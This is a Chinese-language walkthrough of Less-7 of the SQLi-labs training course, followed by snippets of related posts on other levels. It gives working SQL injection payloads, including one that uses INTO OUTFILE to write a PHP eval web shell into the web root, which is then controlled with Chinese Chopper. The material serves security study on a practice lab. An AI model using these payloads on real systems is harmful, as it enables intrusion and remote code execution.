SQLI DUMB SERIES-7

（1）查看PHP源代码

可以看见输入的id被一对单引号和两对圆括号包围

（2）根据提示：Dump into Outfile可知，此次攻击需要导出文件

（3）在第一关获取

@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径

?id=2' union select 1,@@datadir,@@basedir --+

(4)修改MySql配置，以让能在D盘写入文件（MySQL->my.ini)

(5)payload如下

?id=1')) union select 1,'2','<?php @eval($_POST["cmd"]);?>' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\1234.php' --+

尽管显示错误，但在所写目录里有已经写好了文件

（6）运行中国菜刀

至此，攻击完成！

转载于:https://www.cnblogs.com/momoli/p/10678048.html

SQLI DUMB SERIES-7相关推荐

SQLI DUMB SERIES-8
SQLI DUMB SERIES-8思路 ?id=1'--+ 构造闭合发现没有回显则我们使用盲注盲注分为几种布尔型盲注 Length() //返回字符串长度 Substr() //取字符串用法 ...
SQLI DUMB SERIES-1-2
安装了SQLI DUMB的题库这些都是为了了解sql注入的方式,碰到的题目就是这样的题去找flag.现在就是去探索方法首先我们要知道不管什么数据库注入,检测是否有注入点是第一步第一题 1.提示输 ...
SQLI DUMB SERIES-10
第十关的步骤与第九关相同可以查看之前的第九关打法 SQLI DUMB SERIES-9 //猜库名?id=1' and if(ascii(substr(database(),1,1))=115,sl ...
SQLI DUMB SERIES-2
SQLI DUMB SERIES-2思路 ?id=-1 union all select 1,database(),3 from users --+ ?id=-1 select 1,group_con ...
SQLI DUMB SERIES-4
?id=1" 报错 You have an error in your SQL syntax; check the manual that corresponds to your MySQL ...
SQLI DUMB SERIES-5
less5 (1)输入单引号,回显错误,说明存在注入点.输入的Id被一对单引号所包围,可以闭合单引号 (2)输入正常时:?id=1 说明没有显示位,因此不能使用联合查询了:可以使用报错注入,有两种方式 ...
SQLI DUMB SERIES-16
(1)无论怎么输入,都没有回显,但当输入 admin")#时,显示登录成功.若通过其他方法获取数据库的用户名,可通过这个方法登录成功. (2)获取其他信息可用考虑时间延迟注入.方法同15. ...
SQLI DUMB SERIES-3
?id=1') 构造闭合 ?id=1') --+ 注释后面内容 ?id=1') order by 4–+ 4报错 3不报错故有3列 ?id=-1') union all select 1,2,3 f ...
SQLI DUMB SERIES-1
less-1 (1) 可以看到提示输入ID,而且less-1题目也有提到GET,因此试试以下操作: http://127.0.0.1/sqli-labs-master/Less-1/?id=1 结果: ...

SQLI DUMB SERIES-7

SQLI DUMB SERIES-7相关推荐

最新文章

热门文章